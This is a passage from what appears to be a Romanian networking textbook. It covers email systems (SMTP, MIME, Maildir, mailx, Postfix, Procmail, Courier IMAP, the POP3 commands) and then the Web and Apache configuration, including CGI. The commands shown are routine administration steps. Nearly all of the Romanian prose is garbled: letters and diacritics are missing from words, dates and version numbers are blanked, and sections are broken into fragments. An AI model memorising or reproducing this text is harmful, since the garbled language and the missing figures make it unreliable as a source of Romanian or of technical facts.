Wietse Venema este u p og a ato și fizi ia ola dez, eato ul și p i ipalul
dezvoltator al server-ului de e- ail Postfi . De ase e ea, a s is ai ulte apli aţii î
do e iul se u ităţii siste elo . Di , lu eaza î “tatele Unite la IBM Thomas J.
Watson Research Center unde continua sa dezvolte Postfix. A primit numeroase premii
pe t u a ti ităţile sale.
Ray Tomlinson este persoana care a implementat primul sistem de e-mail într-o eţea,
ai p e is î eţeaua ARPANet. “iste ul putea sa t i ită e-mail-u i pe t u utilizato i legaţi
la computere din ARPANet folosind semnul @ pentru a separa numele utilizatorului de
numele host-ului. A ajutat la i ple e ta ea p oto olului Tel et și a odifi at p og a ul
SNDMSG pentru a permite t i ite ea esajelo și la utilizato i pe alte o pute e su
forma de e-mail-u i. A p i it u e oase p e ii pe t u a ti ităţile sale.
Electronic mail poştă/ esage ie ele t o i ă , a e iat e-mail sau e-mail, este o etodă
de compunere, transmitere, recepţie şi a esa e a esajelo peste siste e de o u i aţie
ele t o i ă. Te e ul se apli ă atât siste elo de e-mail din Internet bazate pe SMTP (Simple
Mail Transfer Protocol ât şi siste elo de g upu i de ola o a e a e pe it utilizato ilo
unei companii sau o ga izaţii să t a s ită esaje alteia. Î a est apitol su t p eze tate
detalii legate de fu ţio a ea şi a hite tu a siste ului de e- ail şi p oto oalele şi apli aţiile
utilizate.
Ideea de esage ie ele t o i ă datează di a ul , â d ‘a To linson dezvolta prima
apli aţie de e-mail pentru ARPANET. Utilizat preponderent la începutul Internetului, serviciul
de e-mail a pie dut te e î faţa alto p oto oale p e u FTP, HTTP, Bitto e t. Cu toate
a estea, e ti de ea I te etului şi apa iţia u o forme diverse de platforme de colaborare
asigu ă folosi ea la s a ă la gă a se i iului. Da ă la î eput o u i aţia p i e-mail se realiza
î ea ai a e pa te î t e două pe soa e, o u ă pa te di esajele t i ise î I te et su t
mesaje pentru liste de dis uţii, fo u u i, siste e de ticketing sau bug-tracking sau pentru alte
forme de colaborare.
P o a il ă ea ai i po ta tă p o le ă a se i iului de e-mail sunt mesajele nesolicitate
(e-mail spam . “e ap e iază ă esajele esoli itate ep ezi tă peste 80% din totalul de
mesaje din lume. Diferite tehnici anti-spam precum integrarea lor în serverele de transfer,
DNS blacklisting, greylisting sunt folosite pentru a bloca mesajele nesolicitate.
284 | ‘ e ţ e l e L o a l e
1
RFC 822
285 | E - m a i l
To:bogdan@berserk.org To:bogdan@berserk.org
From: ana@avatar.org From: ana@avatar.org
mx.berserk.org
MX berserk.org?
ns.berserk.org
1
RFC 2822
287 | E - m a i l
8.1.2.1 MIME
Dat fii d faptul ă î o e tul ela o ă ii a esto spe ifi aţii u se pu ea p o le a de a
transmite altceva decât text, nu s-a defi it e a t fo a o ţi utului unui mesaj. Nevoia de a
t a s ite alt e a de ât te t î ad ul u ui esaj audio/ ideo a dus la apa iţia u o
p o le e. “oluţia a fost MIME (Multipurpose Internet Mail Extension)1. Dato ită la gii
ăspâ di i a siste ului defi it de ‘FC , MIME u putea să fie gâ dit de ât a o adăugi e la
a este spe ifi aţii, i ide u a o î lo ui e.
Utilitarul uuencode poate fi folosit pe t u odifi a ea fişie elo i a e î fo at a e poate
fi transmis prin e-mail:
razvan@valhalla:/tmp$ uuencode Test_vm_lin.zip hello.zip
begin 644 hello.zip
M4$L#!!0````(`&:HDS6\![A=F````,D````0`!4`36%K969I;&4N8VAE8VME
M<E54"0`#<#>(169FB$55>`0`Z`/H`W-V\W%T#U:P5=`-3\S)4=!-Y^+2"_#P
M]XNT4BA)+2[AX@**0IF<J14%^44E"CXN\3Z>3D&.09'Q`8XA'K9Z"FIJ"GKZ
M$.5)I9DY*;H%1:E67)Q<7"`QB&Z]?"Y.%0UG9TVX10H*"KKY8#D%E3@%71\]
[...]
la server nu este unul de eroare, clientul va folosi în continuare ESMTP, în caz contrar
revenindu-se la folosirea SMTP.
1
RFC 4422
2
RFC 4954
3
RFC 4346
4
RFC 1939
289 | E - m a i l
8.2.1 mbox
Formatul mbox este fo a t adiţio ală de sto a e a esajelo pe u siste U i î t -un
singu fişie aso iat fie ă ui utilizato . Fie a e ou esaj di fişie î epe u o li ie a e î epe
cu From u at de u a a te spaţiu.
1
RFC 2060
290 | ‘ e ţ e l e L o a l e
Formatul mbox este formatul folosit implicit de majoritatea MTA-u ilo . Î od o iş uit,
1
mesajele sunt livrate în directorul /var/spool/mail/$USERNAME . MTA-u ile pot fi, î să,
o figu ate să li eze esajele î t -u fişie de tipul mbox din directorul home al utilizatorului.
Î t u ât fişie ul mbox poate fi a esat si ulta atât de MTA ât şi de se e ul IMAP/POP ,
este necesa ă o fo ă de locking a e să asigu e o siste ţa a esului. Î od e ide t,
locking-ul at age după si e pe aliză i de pe fo a ţă şi difi ultatea i ple e tă ii pe u
siste de fişie e o tat î eţea u a fi NF“ . A este p o le e au fost ele a e au condus
la crearea formatului Maildir.
8.2.2 Maildir
Formatul Maildir se deose eşte de fo atul mbox p i faptul ă u e esită e a is e
de locking pe t u a asigu a i teg itatea esajelo î ti p e esajele su t adăugate, şte se,
mutate. Fiecare mesaj este me ţi ut î t -u fişie sepa at. Modifi ă ile su t ealizate p i
i te ediul ope aţiilo ato i e peste siste ul de fişie e.
Formatul Maildir a fost creat de Daniel J. Bernstein în momentul scrierii serverului qmail.
Directorul Maildir o ţi e t ei su di e toare: tmp, new şi cur, localizate, de obicei, în
cadrul unui director din home-ul utilizatorului:
razvan@anaconda:~$ ls -F /home/razvan/Maildir/
courierimaphieracl/ courierimapsubscribed courierpop3dsizelist new/
courierimapkeywords/ courierimapuiddb cur/ tmp/
Fişie ele di di e to ul new sunt mesaje livrate dar care nu au fost citite. Linia care începe
cu From u ai este e esa ă. După e u esaj este izualizat este utat î di e to ul cur.
Directorul tmp este folosit în mo e tul li ă ii esajelo pe t u a sto a u esaj pâ ă la
scrierea acestuia în directorul new.
1
http://en.wikipedia.org/wiki/Filesystem_Hierarchy_Standard#Directory_structure
291 | E - m a i l
8.3.1 mailx
mailx o e siu e î u ătăţită a mail este u utilita pe t u t a s ite ea şi p i i ea
de mesaje pe sisteme Unix. Este un client de e- ail de ază, lipsit de posibilitatea de citire a
mesajelor de pe alt sistem. Mesajele sunt citite de pe sistemul local.
Deşi u puţi e fu ţio alităţi, mailx poate fi folosit pe t u a e a ea apidă a
mesajelor stocate pe siste ul lo al. Cea ai f e e tă utilizare a mailx este transmiterea de
esaje di e t di li ia de o a dă. A est lu u pe ite folosi ea mailx în majoritatea
s iptu ilo a e auto atizează t i ite ea de esaje de poştă ele t o i ă.
Citirea mesajelor se face interactiv prin invocarea comenzii mailx (sau forma
o pati ilă mail):
alina@anaconda:~$ mail
Mail version 8.1.2 01/15/2001. Type ? for help.
"/var/mail/alina": 24 messages 24 new
>N 1 liviu.dumitrascu@ Sat Jun 9 01:24 178/20754 61 joburi noi pentru tine
N 2 newsletter@9am.ro Sat Jun 9 02:47 960/53849 Casatorii pentru comunitate
N 3 liviu.dumitrascu@ Sat Jun 9 07:46 96/7653 Horoscopul Carierei pentru
N 4 liviu.dumitrascu@ Sun Jun 10 01:06 165/18540 17 joburi noi pentru tine
N 5 newsletter@wall-s Sun Jun 10 02:11 312/41081 Cele mai citite articole di
N 6 newsletter@9am.ro Sun Jun 10 09:25 660/52453 Cele mai citite articole di
N 7 newsletter@wall-s Mon Jun 11 03:20 446/38829 Luni, 11 Iunie - O saptamana
Caracterul . sau opţio al CT‘L-D) î sea ă î heie ea esajului. mailx soli ită
introducerea unui destinatar de tipul Carbon Copy, a e a fost ig o ată.
Da ă esajul este sto at î t -u fişie , se poate folosi u ătoa ea o a dă pe t u
transmiterea sa:
razvan@anaconda:~$ cat hello.txt | mail -s "Filmul saptamanii" ana@avatar.com
8.4 MTA
“e ap e iază ă, î ziua de astăzi, peste % di MTA-u ile e iste te î I te et ulează
Sendmail, Microsoft Exchange Server, Postfix şi Exim.
Sendmail a fost pe t u ultă e e se e ul de e- ail i pli it dato ită dez oltă ii sale
î ă de la î eputul Internetului. Sendmail a fost s is de E i All a la î eputul a ilo .
Ve siu ea a tuală este . . Sendmail nu a fost proiectat cu aspecte de securitate drept
pe t u a e a fost auza a u e oase ata u i pe pa u sul dez oltă ii I te etului.
Problemele de securitate ale Sendmail au condus la crearea Qmail şi Postfix. Qmail, scris
de Daniel J. Bernstein, s-a do it a fi e oluţio a p i p oie ta ea e ţi ea o t de se u itate.
Di pă ate, î epâ d u , Qmail u ai este dez oltat şi u ă ul de siste e e ulează
Qmail a s ăzut.
Postfix a u ă it, de ase e ea, ate t o diţiile e esa e pe t u asigu a ea se u ităţii.
Una dintre deciziile importante a fost abandonarea sistemului monolitic folosit de Sendmail şi
292 | ‘ e ţ e l e L o a l e
folosirea unui sistem modular. Postfix este compus dintr-un set de daemoni cu drepturi
limitate care îndeplinesc diverse sarcini necesare.
Exim foloseşte odelul o oliti al Sendmail fă ă a a ea pa te, î să, de a eeaşi isto ie de
ul e a ilităţi. Cu os â du-se problemele de securitate ale Sendmail, Exim a fost proiectate
pentru a nu suferi de a eleaşi ul e a ilităţi. Aju s la versiunea 4, Exim este MTA cu un nivel
ridicat de configurabilitate. Printre funcţio alităţile a a sate ale Exim se u ă ă folosi ea de
liste de a es şi i teg a ea u ui framework de s a a e a o ţi utului util a filt u a ti i us sau
anti-spam.
În lumea Unix, Sendmail ă â e el ai folosit MTA. Totuşi, difi ultatea î o figu a e,
isto ia de ul e a ilităţi şi e iste ţa u o soluţii p e u Postfix şi Exim a dus la diminuarea
i stală ilo de Sendmail. Î ziua de astăzi, ajo itatea ad i ist ato ilo de siste e o a dă
folosirea Postfix sau Exim.
8.5 Postfix
Apă ut i iţial î ad ul u ui p oie t de ju ătate de a po it de Wietse Ve e a, Postfix a
fost dezvoltat ulterior, dovedindu-se o alte ati ă ai apidă şi ai sigu ă pe t u Sendmail.
Obiectivele de proiectare ale Postfix au fost fia ilitatea, pe fo a ţa, uşu i ţa î utiliza e
şi ad i ist a e şi se u itatea. Postfix pu e la dispoziţia ad i ist ato ului u u ă li itat de
fişie e de o figu a e u di e ti e si ple. Pe t u a fa ilita adopta ea Postfix ca MTA, multe
di t e fişie ele şi o e zile folosite de Sendmail sunt compatibile în Postfix. Comenzi precum
sendmail, newaliases şi fişie e p e u /etc/aliases sau .forward şi-au păst at olul şi î
Postfix.
Problemele majore ale Sendmail au fost cele de securitate. Postfix foloseşte o se ie de
e a is e pe t u asigu a ea se u ităţii. U a di de iziile de p oie ta e i po ta te a fost
modularitatea. În vreme ce Sendmail este un sistem monolitic, folosind un singur executabil cu
drepturi privilegiate pentru executarea sarcinilor, Postfix foloseşte u p o es u d eptu i
li itate pe t u fie a e tip de sa i ă. Fie a e di p o esele Postfix, de u ite şi age ţi, ulează
sub paradigma celui ai i p i ilegiu şi e e ută doa sa i a p op ie: t a s ite e esaj,
sto a e esaj, li a e lo ală, gestiu ea ozii, et . “i gu ul p o es a e ulează u d eptu i
p i ilegiate este p o esul aste a e le po eşte pe toate elelalte. Postfix foloseşte de
asemenea facilitatea de chroot a sistemelor Unix pentru a limita vizibilitatea sistemului de
fişie e pe t u u p o es. De o i ei, p o esele Postfix sunt rulate în jail-ul
/var/spool/postfix.
8.5.1 Arhitectură
8.5.2 Instalare
Pe sistemele Debian-based, Postfix este dispo i il î fo a i a ă î pa hetul postfix.
# apt-get install postfix
8.5.3.1 Jurnalizare
Ve ifi a ea o e titudi ii fu ţio ă ii se e ului Postfix se ealizează, de o i ei, p i
i spe ţia fişie elo de ju aliza e. Î od o iş uit, fişie ele de ju aliza e se găses î
/var/log/mail.*. E istă, de o i ei, fişie e o espu zătoa e dife itelo i elu i de
ju aliza e şi e oa e:
mail.log
mail.info
mail.err
mail.warn
A este fişie e pot fi i spe tate pe t u a e ifi a e esaje su t t a s ise sau pe t u a
e ifi a e o ile apă ute la t a s isia u ui esaj. Cele fişie e o espund nivelurilor de
jurnalizare diferite: erori (.err), avertismente (.warn , i fo aţii .info , ope aţii ju alizate
(.log).
sau
# postfix reload
294 | ‘ e ţ e l e L o a l e
8.5.4.1 postconf
Alte a ea fişie ului /etc/postfix/main.cf poate fi ealizată p i i te ediul u ui edito ,
da se e o a dă folosi ea o e zii postconf. Comanda postconf poate fi folosită pe t u
e ifi a ea fişie ului p i ipal de o figu a e, pe t u izualiza ea di e ti elo de o figu a e
sau pentru modificarea unei directive. Directivele care nu sunt configurate în
/etc/postfix/main.cf au o valoare implicită.
Afişa ea o figu aţiei a tuale se ealizează p i ula ea fă ă a gu e te a o e zii
postconf:
cuirass:~# postconf | head -3
2bounce_notice_recipient = postmaster
access_map_reject_code = 554
address_verify_default_transport = $default_transport
Î a eastă o figu aţie, esajele li ate ăt e a a@lo alhost, a a@lo alhost.lo aldo ai ,
a a@ ui ass.lo aldo ai , a a@test. s.pu . o o aju ge î ăsuţa poştală a utilizatorului ana.
Postfix va a ţio a a relay doa pe t u esajele t i ise de pe staţia lo ală. Mesaje sosite
di eţea u o fi li ate do e iilo de a e se e ul u este espo sa il.
Î lista ea de ai jos se î ea ă t i ite ea u ui esaj ăt e do e iul gmail.com prin
conectare pe i te faţa . . . . “pe ifi a ea desti ata ului eşuează u p e iza ea
esajului „Relay access denied
cuirass:~# telnet 172.16.68.128 25
Trying 172.16.68.128...
Connected to 172.16.68.128.
Escape character is '^]'.
220 cuirass.localdomain ESMTP Postfix (2.5.5)
EHLO localhost
[...]
MAIL FROM: ana
250 2.1.0 Ok
RCPT TO: razvand@gmail.com
554 5.7.1 <razvand@gmail.com>: Relay access denied
După u se o se ă, deţi ăto ul ăsuţei poştale i tuale este root. Căsuţa poştală
i tuală a fi a esată şi de se e ul POP /IMAP şi t e uie o figu at u utilizato o u atât
pentru livrare (Postfix ât şi pe t u a es POP /IMAP :
cuirass:/var/mail# useradd -g mail vmail
cuirass:/var/mail# id vmail
uid=1005(vmail) gid=8(mail) groups=8(mail)
299 | E - m a i l
Mesajele t a s ise ăt e
info@gamma.com o fi sto ate î ăsuţa poştală
/var/mail/vhosts/gamma.com/info/ în format Maildir. De aici vor putea fi citite prin
o figu a ea o espu zătoa e a u ui se e POP /IMAP.
Î ulti ă fază t e uie a ti at daemonul saslauthd. Întrucât Postfix ulează î t -un jail
chroot, saslauthd t e uie o figu at o espu zăto . Fişie ul de o figu a e pe t u
saslauthd este /etc/default/saslauthd. “e eează di e to ul /var/spool/postfix/
var/run/saslauthd:
cuirass:~# mkdir -p /var/spool/postfix/var/run/saslauthd
în
OPTIONS="-c -m /var/spool/postfix/var/run/saslauthd"
8.5.7.3 Verificare
Pe t u e ifi a ea supo tului “A“L şi TL“ se foloseşte o a da “MTP EHLO:
cuirass:~# telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 cuirass.localdomain ESMTP Postfix (2.5.5)
EHLO localhost
250-cuirass.localdomain
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH LOGIN PLAIN
250-AUTH=LOGIN PLAIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
P eze ţa li iilo “TA‘TTL“ şi AUTH LOGIN PLAIN î sea ă supo t alid TL“ şi “A“L pe tru
Postfi . Pe t u folosi ea a estui supo t lie ţii de e- ail t e uie o figu aţi o espu zăto .
8.6 MDA
În general, serverele de e-mail despre care s-a dis utat pâ ă a u i lud o o po e tă
a e se o upă de li a ea lo ală a esajelo . E istă, î să, situaţii î a e se do eşte ai ultă
fle i ilitate î li a ea esajelo , de la a a ja ea esajelo î utii poştale spe iale î fu ţie
de p o e ie ţa lo , pâ ă la a ti a ea de filt e antispam. Spre exemplu, Sendmail u ofe ă
supo t pe t u ăsuţe poştale î fo mat Maildir. Î a eastă situaţie t e uie folosit u MDA
pe t u li a ea esajelo ăt e ăsuţele poştale î fo at Maildir.
8.6.1 Procmail
Procmail fo ează, î p eu ă u Maildrop, ele ai u os ute două MDA-uri. Procmail
este, de obicei, instalat implicit pe dist i uţiile Debian-based. Altfel, se poate instala folosind
apt-get:
301 | E - m a i l
î azul folosi ii u ei ăsuţe poştale î fo at Maildir. Ulti a egulă catch-all , sto hează
esajele î ăsuţa poştală î fo at Maildir. Folosi ea a a te ului două puncte în cazul primei
eguli î sea ă folosi ea fişie ului i pli it de locking.
Cele mai importante câmpuri de control sunt:
H - e ifi a ea o diţiilo se fa e î a tetul esajului H = header ; da ă u se spe ifi ă i i ,
acest câmp este configurat implicit;
B - e ifi a ea o diţiilo se fa e î o pul esajului;
D - case sensitive i pli it u se fa e disti ţie î t e lite ele a i şi i i ;
c - se ge e ează o opie a esajului;
w - se aşteaptă a p og a ul sau filt ul să se te i e şi e ifi ă aloa ea de ieşi e a a estuia
odul de etu ; da ă u s-a terminat cu succes, atunci filtrul nu este aplicat.
Co diţiile su t fo ate di e p esii egulate la a e se adaugă âţi a operatori speciali
u a fi „! pe t u i e sa ea o diţiei sau „< espe ti „> pentru a compara dimensiunea
mesajului cu anumite limite.
A ţiu ile e pot fi apli ate su t:
o i t a e î siste ul lo al de fişie e u de a fi sto at esajul;
! - t i ite esajul la ad esa spe ifi ată;
| - po eşte u p og a spe ifi at;
{ } - spe ifi ă u lo î i te io ul ă uia pute spe ifi a alte eguli.
8.7.1.1 Instalare
I stala ea se e ului se ealizează p i i te ediul i stală ii pa hetului courier-imap.
# apt-get install courier-imap
8.7.1.2 Configurare
Fişie ele de o figu a e pe t u se e ul de IMAP se găses î /etc/courier/ şi su t
imapd, pe t u o figu a ea fu ţio alităţii se e ului, şi authdaemonrc, pentru configurarea
daemon-ului de autentificare.
Di e ti ele di fişie ul imapd sunt în formatul NUME=valoare. Aici se pot schimba adresa
pe a e as ultă se e ul, po tul, u ă ul de p o ese a e pot fi des hise, u ă ul a i de
conexiuni, etc. De asemenea, aici se pot stabili alte valori pentru numele directoarelor
implicite, prin alterarea di e ti elo espe ti e. Astfel, da ă se do eşte s hi a ea u elui
di e to ului i pli it de e epţie a esajelo (Maildir), se va înlocui linia
MAILDIRPATH=Maildir
cu
MAILDIRPATH=Mymail
Password:
Reenter password:
cuirass:~# makeuserdb
8.8 Webmail
Î od f e e t, a esa ea ăsuţelo poştale se ealizează utilizâ d dife iţi lie ţi
IMAP/POP i stalaţi pe sistemul clientului, cum sunt, spre exemplu, Mozilla Thunderbird,
Outlook Express, Kmail, Evolution, Mutt, et . Î ulte situaţii se do eşte posi ilitatea a esă ii
apide a ăsuţei poştale de pe dife ite siste e fă ă a i stala sau o figu a pe a estea u lient
de e-mail. Pe t u ase e ea situaţii e istă apli aţii de a esa e a ăsuţelo poştale p i
i te faţa e . Cele ai u os ute, la o e tul a tual, su t Horde, “ ui elMail şi
RoundCube.
HELO - o a dă utilizată pe t u ide tifi a ea se e ului şi a lie tului “MTP. Clie tul a
i iţia sesiu ea p i t -o astfel de o a dă î a e îşi a u ţă u ele o plet FQDN - Fully
Qualified Domain Name . Da ă se e ul a eptă sesiu ea, a ăspu de u odul 50 urmat de
u ele său.
MAIL FROM - este p i a di o e zile utilizate pe t u t i ite ea efe ti ă a esajului şi
a e a ol spe ifi a ea ide tităţii auto ului esajului. Da ă ăspu sul se e ului este OK
u î sea ă a esajul a fi eapă at li at, deoa e e, î fu ţie de alte o e zi, se poate
întoarce un cod de eroare.
RCPT TO - pe ite spe ifi a ea desti ata ului esajului. Da ă se e ul e u oaşte
utilizato ul, atu i se a ăspu de u OK; astfel se a etu a u od de e oa e
306 | ‘ e ţ e l e L o a l e
.
DELE 1
+OK
LIST
+OK
2 505
3 521
.
QUIT
+OK
Connection closed by foreign host.
STAT - soli ită se e ului i fo aţii desp e ăsuţa poştală a utilizato ului. U ăspu s
pozitiv din partea serverului este +OK <numar_mesaje> <dimensiune_totala>.
LIST - da ă a eastă o a dă este apelată fă ă niciun a gu e t, se e ul a afişa i fo aţii
desp e esaje, âte o li ie pe t u fie a e. Co a da se poate apela şi a â d a argument un
u ă de esaj, se e ul etu â d î a est az doa li ia o espu zătoa e esajului. Nu se
poate i o a pe t u esajele a ate pe t u şte ge e.
RETR msg - afişează o ţi utul esajului msg; o i e o a dă ulte ioa ă u efe i e la a est
mesaj va genera o eroare.
DELE msg - a hează esajul msg pe t u şte ge e; esajele u o fi şte se efe ti de ât
la închiderea sesiunii.
NOOP - clientul u soli ită i io a ţiu e, i doa ăspu s poziti di pa tea se e ului.
RSET - a ulează a ajul de şte ge e pe t u toate esajele a ate.
QUIT - se e ul a şte ge toate esajele a ate pe t u şte ge e şi a etu a +OK sau -
ERR î fu ţie de euşita ope aţiei.
HELP - o a dă de ajuto .
308 | ‘ e ţ e l e L o a l e
Î tre ări
1. Ca e afi aţii su t ade ă ate î eea e p i eşte siste ul de poştă ele t o i ă?
SMTP este protocolul utilizat între MTA (Mail Transfer Agent).
“MTP este p oto olul utilizat de ăt e o apli aţie de tip MUA Mail User Agent) pentru a
transfera mesajele de pe server.
“MTP utilizează po tul .
SMTP nu este folosit pe t u poştă ele t o i ă.
9. Ce ep ezi tă u do e iu i tual?
u do e iu ai ă ui utilizato i u e istă efe ti pe se e .
un domeniu pentru care nu se face relay.
un nume alternativ la serverului de mail.
niciuna din variantele de mai sus.
Cine este...
Sir Tim Berners-Lee este e etăto ul editat u i e ta ea Wo ld Wide We -ului. Pe
de e ie a ealizat p i a o u i aţie HTTP î I te et î t e u se e și u
client. În prezent este directorul World Wide Web Consortium (W3C).
Robert McCool este autorul webserver-ului NCSA HTTPd, ulterior cunoscut sub numele
Apache HTTP Server. A scris prima versiune ca student la Universitatea din Illinois unde a
lu at u e hipa i iţială a NC“A Mosai u ul di t e p i ele o se -e web). A contribuit la
spe ifi aţia i iţială a Co o Gate a I te fa e CGI a e s-a dovedit a fi un element
cheie în realizarea unui web dinamic. În prezent este dezvoltator la Yahoo!.
Ward Cunningham este creatorul primului software de wiki numit WikiWikiWeb
(1994). Software-ul de iki a fost folosit i iţial î i te io ul o pa iei sale. A lu at la
Mi osoft Co po atio și la E lipse Fou datio ia i p eze t este CTO la o pa ia
AboutUs.
World Wide Web-ul este u spaţiu de i fo aţie î a e ele e tele de i te es, u oscute
su u ele de esu se, su t e u os ute p i utiliza ea u o ide tifi ato i glo ali, de u iţi
URI (Uniform Resource Identifiers). Termenul nu trebuie confundat cu Internetul; web-ul este
de fapt u se i iu a e a ţio ează deasup a I te etului.
folosirii acestor resurse în Internet a produs ceea ce Sir Tim Berners-Lee a denumit, la
î eputul a ilo , Wo ld Wide We .
Sir Tim Berners-Lee a e e itul de a fi găsit soluţia de su es a e să st u tu eze a titatea
astă de i fo aţie di ad ul I te etului apă ută a u a e a e ti de ii a estuia la sfâ şitul
a ilo ' şi î eputul a ilo ' . După ulte te tati e e euşite de a o ga iza a este
i fo aţii, Be e s-Lee a găsit soluţia a e s-a impus, prin folosirea conceptului de hypertext la
un loc cu Internetul. În acest proces el a dezvoltat un sistem de identificatori globali unici
pentru resurse din Web: URI (Uniform Resource Identifiers).
1
http://tools.ietf.org/html/rfc1738
312 | ‘ e ţ e l e L o a l e
U
RL GET /pub/file.html HTTP/1.1
Host: www.samplesite.org
sistem de
server Web fişie e
1
http://news.netcraft.com/archives/web_server_survey.html
315 | W o r l d W i d e W e b
pentru platforme non-UNIX (precum Windows), un nou API, suport IPv6, introducerea unui
nivel de portabilitate, Apache Portable Runtime1. Ve siu ea sta ilă u e tă a se e ului este
2.2.9.
“etul de i te feţe de p og a a e API pe a e Apa he îl pu e la dispoziţie este cel care
asigu ă e te si ilitatea a estuia p i i te ediul odulelo . Pa hetul p i ipal o ţi e
se e ul HTTP, u â d a soli ită ile supli e ta e să fie satisfă ute p i adăuga ea de oi
module, precum mod_ssl, mod_perl, mod_php, mod_auth, etc.
Ve siu ea de Apa he folosită pe pa u sul a estui apitol este . , dispo i ilă î e siu ea
sta ilă De ia Et h, î De ia Le şi ulti ele e siu i de U u tu.
9.2.1 Instalare
I stala ea e siu ii Apa he . se ealizează î od o iş uit folosi d apt-get:
ragnarok:~# apt-get install apache2
Reading package lists... Done
Building dependency tree... Done
The following extra packages will be installed:
apache2-mpm-worker apache2-utils apache2.2-common
The following NEW packages will be installed:
apache2 apache2-mpm-worker apache2-utils apache2.2-common
0 upgraded, 4 newly installed, 0 to remove and 0 not upgraded.
Need to get 1765kB of archives.
After unpacking 4547kB of additional disk space will be used.
Do you want to continue [Y/n]? Y
[...]
Module authz_groupfile installed; run /etc/init.d/apache2 force-reload to enable.
Module authn_file installed; run /etc/init.d/apache2 force-reload to enable.
Module authz_host installed; run /etc/init.d/apache2 force-reload to enable.
Setting up apache2-mpm-worker (2.2.3-4+etch1) ...
Starting web server (apache2)....
1
http://apr.apache.org/
316 | ‘ e ţ e l e L o a l e
1
http://httpd.apache.org/docs/2.2/mod/quickreference.html
2
http://httpd.apache.org/docs/2.2/sections.html
317 | W o r l d W i d e W e b
ATENŢIE: Fişie ele spe ifi ate su t spe ifi e dist i uţiilo De ia /U u tu. Deşi alte
dist i uţii au, de ase e ea, o st u tu ă a fişie elo de o figu a e, lo aţia şi de u i ea
acestora pot diferi.
DocumentRoot /var/www/
<Directory />
Options FollowSymLinks
AllowOverride None
</Directory>
<Directory /var/www/>
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
# This directive allows us to have apache2's default start page
# in /apache2-default/, but still have / go to the right place
RedirectMatch ^/$ /apache2-default/
</Directory>
[...]
ErrorLog /var/log/apache2/error.log
[...]
</VirtualHost>
Directivele allow şi deny sunt folosite pentru a permite sau refuza accesul la director.
Directiva Order i di ă o di ea î a e a estea o fi e aluate. Da ă a e ista o di e ti ă deny
from all, atu i o i e a es a fi efuzat pe t u ă di e ti a deny este a alizată ulti a.
RedirectMatch ^/$ /apache2-default/
Co figu a ea u ui odul, ealizată fie î fişie e .conf spe ializate sau fişie e glo ale,
foloseşte di e ti e î ad ate de di e ti a IfModule. Directiva IfModule testează da ă odulul
espe ti este î ă at î se e . Astfel, pe t u a o figu a mod_ssl se foloseşte o o st u ţie
de forma:
<IfModule mod_userdir.c>
...
</IfModule>
Folosirea de aliasu i este o diţio ată de e iste ţa odulului mod_alias. Acest modul
este î ă at i pli it la po i ea se e ului Apa he :
ragnarok:~# ls /etc/apache2/mods-enabled/alias.*
/etc/apache2/mods-enabled/alias.load
C ea ea a uală a legătu ilo si oli e este destul de difi ilă şi sus epti ilă la e o i.
“oluţia e o a dată este folosi ea s iptu ilo a2enmod şi a2dismod oferite de Debian pentru
activarea, respectiv dezactivarea modulelor din server:
ragnarok:~# a2dismod userdir
321 | W o r l d W i d e W e b
Un program CGI este specificat prin intermediul unui URL, spre exemplu
http://www.example.com/simple.cgi. Folosirea acestui URL impune serverului web rularea
p og a ului aso iat. “e e ul e ole tează ezultatul ulă ii p og a ului şi îl t a s ite
lie tului. A est lu u a e deza a tajul ulă ii u ui p o es sepa at pe t u fie a e i sta ţă de
e e e. O soluţie este folosi ea de odule p e u mod_php sau mod_perl [vezi 9.2.3.3] care
pe it i teg a ea u ui i te p eto î se e ul e . O altă soluţie este folosi ea de li aje de
p og a a e p e u C a e pot ati ge o efi ie ţă ai a e p i te i a ea ai apidă a
e e uţiei.
“upo tul de CGI pe t u Apa he este o ţi ut p i i te ediul odulului mod_cgi. Întrucât
nu este activat implicit, trebuie activat manual:
ragnarok:~# a2enmod cgi
Module cgi installed; run /etc/init.d/apache2 force-reload to enable.
ragnarok:/etc/apache2/mods-enabled# apache2ctl restart
Directorul de unde se vor executa scripturile CGI este definit prin intermediul directivei
ScriptAlias şi este, i pli it, /usr/lib/cgi-bin/. Accesul la scriptul /usr/lib/cgi-
bin/sample.cgi se ealizează p i i te ediul u ui U‘L de fo a http://localhost/cgi-
bin/script.cgi. Opţiu ea ExecCGI este ea a e spe ifi ă se e ului e e uţia s iptului p i
i te ediul u ei apli aţii e te e.
U s ipt si plu CGI este u ăto ul program C:
ragnarok:~# cat sample.c
#include <stdio.h>
int main (void)
{
printf ("Content-type: text/html\n\n");
printf (
"<html>\n"
"\t<head>\n"
"\t\t<title>Pagina mea</title>\n"
"\t</head>\n"
"\t<body>\n"
"\t\t<h1>Hello, World!</h1>\n"
"\t</body>\n"
"</html>\n"
);
return 0;
}
ragnarok:~# gcc -Wall sample.c -o sample.cgi
ragnarok:~# mkdir /usr/lib/cgi-bin/
ragnarok:~# cp sample.cgi /usr/lib/cgi-bin/
Programul C a fost compilat, numele executabilului fiind sample.cgi; extensia .cgi este
opţio ală. E e uta ilul a fost opiat î /usr/lib/cgi-bin. Întrucât directorul nu exista
anterior a fost creat.
Pentru testare putem folosi telnet sau netcat:
ragnarok:~# telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.localdomain.
Escape character is '^]'.
323 | W o r l d W i d e W e b
Pentru exemplificare se vor instala modulele mod_php5 şi mod_perl2 care permit rularea
de scripturi PHP sau Perl prin intermediul serverului web.
9.2.3.3.1 mod_php
“upo tul PHP se o ţi e p i i te ediul odulului mod_php5:
ragnarok:~# apt-get install libapache2-mod-php5
Reading package lists... Done
Building dependency tree... Done
The following extra packages will be installed:
apache2-mpm-prefork php5-common
Suggested packages:
php-pear
The following packages will be REMOVED:
apache2-mpm-worker
The following NEW packages will be installed:
apache2-mpm-prefork libapache2-mod-php5 php5-common
0 upgraded, 3 newly installed, 1 to remove and 0 not upgraded.
Need to get 3044kB of archives.
After unpacking 5870kB of additional disk space will be used.
Do you want to continue [Y/n]? Y
[...]
9.2.3.3.2 mod_perl
Suportul Perl se o ţi e p i i stala ea odulului mod_perl2:
ragnarok:~# apt-get install libapache2-mod-perl2
Scripturile Perl sunt folosite ca scripturi CGI. Pentru aceasta, scriptului Perl test.pl îi sunt
a o date d eptu i de e e uţie, după a e este opiat î /usr/lib/cgi-bin/:
